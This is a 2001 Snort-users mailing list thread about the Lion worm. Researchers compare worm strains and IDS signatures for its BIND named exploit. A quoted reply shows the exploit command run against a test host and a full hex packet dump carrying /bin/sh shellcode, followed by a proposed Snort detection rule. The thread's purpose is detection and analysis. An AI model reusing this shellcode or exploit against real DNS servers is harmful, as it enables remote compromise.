1i0n (aka lion worm) RE: [Snort-users] New Worm Virus is in the wild

Max Vision vision at ...4...
Sat Mar 24 16:18:14 EST 2001


Ok, here is the problem - and this is directly why my writeup is stalled -
is that I have a *different* strain of the worm.  Mine does not contain
the t0rn rootkit, and the exploit is different! "-v r" are not valid
options for the exploit I have (which after analysis I determined to be
released by LSD in February).

Can someone please forward a copy of your crew.tgz - only if it includes
the /lib/scan heirarchy - all crew.tgz downloaded March 23rd do not have
this (like mine).

The signature I mentioned always catches the worm strain I have (from
coollion.51.net on March 23rd, as well as the LSD exploit if run
separately.)

I suspect I just wasted a day of research time studying the "wrong" strain
of the worm.  Oh well, it's dead anyway, the ISP removed the file.

Again, I'm looking for a crew.tgz that is not 13365 bytes in size.

Thanks :)
Max

On Sat, 24 Mar 2001, [iso-8859-1] Andreas �stling wrote:

> On Fri, 23 Mar 2001, Max Vision wrote:
>
> > I created a signature to detect this attack February 8th, when the exploit
> > was released (IDS482/named-exploit-tsig-infoleak) - I did this because LSD
> > were the first people to release a *decent* working bind exploit.  So I
> > wrote a signature for it... sure enough that is exactly what is used by
> > this worm.  People using vision.conf since february 8th should have seen
> > alerts for this attack (if the worm dropped by, whether it was successful
> > or not).
>
> Hmm.. so far I have seen the Lion worm executing the named exploit two
> times in the wild. However, the latest vision.conf did not catch it (but
> matching just "/bin/sh" on another Snort machine did).
>
> Here I successfully exploit named on a RH 6.2 on my home network by
> running "./bind 192.168.1.1 -v r" (using lib/scan/bind from crew.tgz)
> , just like Lion does:
>
> 03/24-20:32:56.769354 192.168.1.3:1038 -> 192.168.1.1:53
> UDP TTL:64 TOS:0x0 ID:8792 IpLen:20 DgmLen:537
> Len: 517
> AB CD 01 00 00 02 00 00 00 00 00 01 3F 90 90 90  ............?...
> EB 3B 31 DB 5F 83 EF 7C 8D 77 10 89 77 04 8D 4F  .;1._..|.w..w..O
> 20 89 4F 08 B3 10 89 19 31 C9 B1 FF 89 0F 51 31   .O.....1.....Q1
> C0 B0 66 B3 07 89 F9 CD 80 59 31 DB 39 D8 75 0A  ..f......Y1.9.u.
> 66 BB 06 65 66 39 5E 02 74 08 E2 E0 3F E8 C0 FF  f..ef9^.t...?...
> FF FF 89 CB 31 C9 B1 03 31 C0 B0 3F 49 CD 80 41  ....1...1..?I..A
> E2 F6 EB 14 31 C0 5B 8D 4B 14 89 19 89 43 18 88  ....1.[.K....C..
> 43 07 31 D2 B0 0B CD 80 E8 E7 FF FF FF 2F 62 69  C.1........../bi
> 6E 2F 73 68 90 90 90 90 90 90 90 90 01 FA 01 BF  n/sh............
> 01 81 01 40 01 81 01 40 01 00 01 00 01 FB 01 BF  ... at ...979...@........
> 01 FA 01 BF 01 00 01 00 01 00 01 00 01 8D 01 40  ...............@
> 01 FB 01 BF 01 52 01 40 01 00 01 00 01 FB 01 BF  .....R. at ...966...
> 01 00 01 00 01 00 01 00 01 62 01 08 01 63 01 08  .........b...c..
> 01 64 01 08 01 FB 01 BF 01 62 01 08 01 FC 01 BF  .d.......b......
> 01 65 01 08 01 00 01 00 01 00 01 00 01 00 01 00  .e..............
> 01 00 01 00 01 00 01 00 01 80 01 40 01 00 01 00  ........... at ...1322...
> 01 85 01 08 01 62 01 08 01 FB 01 BF 00 00 01 00  .....b..........
> 01 01 12 01 88 01 FF 01 01 01 00 01 08 01 12 01  ................
> 06 01 00 01 14 01 FF 01 D4 01 FF 01 55 01 05 01  ............U...
> 60 01 0D 01 06 01 00 01 88 01 FF 01 01 01 00 01  `...............
> AC 01 05 01 B0 01 00 01 FC 01 FF 01 65 01 00 01  ............e...
> A4 01 FF 01 90 01 FF 01 4A 01 08 01 0C 01 00 01  ........J.......
> 60 01 0D 01 00 01 00 01 64 01 11 01 A4 01 BD 01  `.......d.......
> A4 01 FF 01 33 01 08 01 0C 01 00 01 00 01 00 01  ....3...........
> 00 01 00 01 74 01 FF 01 79 01 08 01 0C 01 00 01  ....t...y.......
> A4 01 FF 01 40 01 10 01 00 01 00 01 01 01 00 01  .... at ...868...
> 00 01 00 01 00 01 0D 01 00 01 0D 01 00 01 0D 01  ................
> 80 01 0D 01 80 01 0D 01 80 01 0D 01 80 01 0D 01  ................
> 80 01 0D 01 02 01 00 01 00 01 00 01 00 01 00 01  ................
> CC 01 11 01 B6 01 BD 01 00 01 00 01 A4 01 BD 10  ................
> 06 00 00 00 2D FA FF BF A0 A9 25 3B 00 FC FF BF  ....-.....%;....
> 01 A9 01 3B 00 00 01 00 01 00 00 FA FF           ...;.........
>
> As you can see, IDS482 (|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00
> 01 20 20 20 20 02 61|) does not match this packet.
>
> And another thing.
> The Lion worm can be pretty easily detected by watching for a port 53 SYN
> scan followed by an iquery followed by a named exploit, but I prefer also
> to have a specific rule to catch the actual worm, because that most likely
> means that the previous named exploit was successful.
> For example�something like:
>
> alert tcp any any -> any 53 (msg: "Attempt to set $PATH on port 53/TCP - possibly a successful Lion worm"; content:"PATH="; depth: 5; flags: AP;)
>
> Maybe something similar could be in arachNIDS?
> There are of course several other things you could look for to catch the
> worm. I don't think that the hosts "ifconfig -a" or "killall -HUP inetd"
> should be looked up in the DNS very often for example :)
>
> Regards,
> Andreas �stling
>





More information about the Snort-users mailing list